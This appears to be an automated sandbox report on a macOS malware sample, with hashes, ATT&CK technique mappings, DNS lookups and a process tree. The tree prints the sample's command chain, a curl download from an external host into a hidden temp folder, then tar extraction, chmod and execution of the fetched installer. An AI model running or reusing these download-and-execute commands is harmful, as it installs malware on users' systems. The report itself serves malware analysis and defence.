b850cd121b76d1b1610a05fde0c7a11e3169f545617a5a5b0e7c440bd7b30944

Analysis

max time kernel
38s
max time network
126s
platform
macos-10.15_amd64
resource
macos-20241106-en
resource tags

arch:amd64arch:i386image:macos-20241106-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
submitted
17/02/2025, 18:06 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d
Size

48KB
MD5

f1abdc7426dab256d30da578de73cb9d
SHA1

3219d1b92dada589839cabc5e546561f51ddfe82
SHA256

0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d
SHA512

78b001ec08203b65f38cbc5fa05774b8dfd972f3f8096f5f31132d78906c73d39d59515d51cec0873ca011da68096ae650f6be566eaf3403b2d1ab7cbfa48f53
SSDEEP

1536:cwBxH+LbSTkGJskNYKpfAtcMi7LqK24QIAtAmL:VZ+LbLEjhMcMi7uK21Ttl

Score

7^/10

defense_evasion execution exfiltration

Malware Config

Signatures

Exfiltration Over Alternative Protocol 1 TTPs 1 IoCs

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

exfiltration

Exfiltration Over Unencrypted Non-C2 Protocol

T1048.003

ioc	Process
/usr/bin/curl -qsL -m 1200 "http://bghui.storeyourstreams.xyz/tr/ioffers.tar.gz?ts=1739844739" -o /private/tmp/.mmstmp//stmp.tar.gz	Process not Found

File Permission 1 TTPs
Adversaries may modify file permissions/attributes to evade access control lists (ACLs) and access protected files.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Resource Forking 1 TTPs 1 IoCs

Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.

defense_evasion

Resource Forking

T1564.009

ioc	Process
/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python -	Process not Found

Command and Scripting Interpreter 1 TTPs
Adversaries may abuse Unix shell commands and scripts for execution.
execution

Unix Shell
T1059.004

/bin/sh
sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d\""
1⤵
PID:484

/bin/bash
sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d\""
1⤵
PID:484

/usr/bin/sudo
sudo /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d
1⤵
PID:484
- /bin/zsh
  /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d
  2⤵
  PID:485
- /Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d
  /Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d
  2⤵
  PID:485
- - /usr/bin/python
    /usr/bin/python -
    3⤵
    PID:486
- - /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
    /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python -
    3⤵
    PID:486
  - - /usr/bin/curl
      /usr/bin/curl -qsL -m 1200 "http://bghui.storeyourstreams.xyz/tr/ioffers.tar.gz?ts=1739844739" -o /private/tmp/.mmstmp//stmp.tar.gz
      4⤵
      PID:487

/bin/sh
sh -c "/usr/bin/tar -xvzf /private/tmp/.mmstmp//stmp.tar.gz -C /private/tmp/.mmstmp/"
1⤵
PID:490

/bin/bash
sh -c "/usr/bin/tar -xvzf /private/tmp/.mmstmp//stmp.tar.gz -C /private/tmp/.mmstmp/"
1⤵
PID:490

/usr/bin/tar
/usr/bin/tar -xvzf /private/tmp/.mmstmp//stmp.tar.gz -C /private/tmp/.mmstmp/
1⤵
PID:490

/bin/sh
sh -c "/bin/chmod +x '/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
1⤵
PID:491

/bin/bash
sh -c "/bin/chmod +x '/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
1⤵
PID:491

/bin/chmod
/bin/chmod +x /private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos
1⤵
PID:491

/bin/sh
sh -c "'/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
1⤵
PID:492

/bin/bash
sh -c "'/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
1⤵
PID:492

/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos
/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos
1⤵
PID:492

/usr/libexec/xpcproxy
xpcproxy com.apple.nsurlstoraged
1⤵
PID:493

/usr/libexec/nsurlstoraged
/usr/libexec/nsurlstoraged --privileged
1⤵
PID:493

Network

DNS

bghui.storeyourstreams.xyz

Remote address:

8.8.8.8:53

Request

bghui.storeyourstreams.xyz

IN A

Response
DNS

bghui.storeyourstreams.xyz

Remote address:

8.8.8.8:53

Request

bghui.storeyourstreams.xyz

IN A

No results found

8.8.8.8:53

bghui.storeyourstreams.xyz

dns

144 B
137 B
2
1

DNS Request

bghui.storeyourstreams.xyz

DNS Request

bghui.storeyourstreams.xyz

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Unix Shell

T1059.004

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Hide Artifacts

T1564

Resource Forking

T1564.009

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Exfiltration Over Alternative Protocol

T1048

Exfiltration Over Unencrypted Non-C2 Protocol

T1048.003

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/var/db/nsurlstoraged/dafsaData.bin

Filesize
54KB

MD5
64f469698e53d0c828b7f90acd306082

SHA1
bcc041b3849e1b0b4104ffeb46002207eeac54f3

SHA256
d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd

SHA512
a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f

Download Submit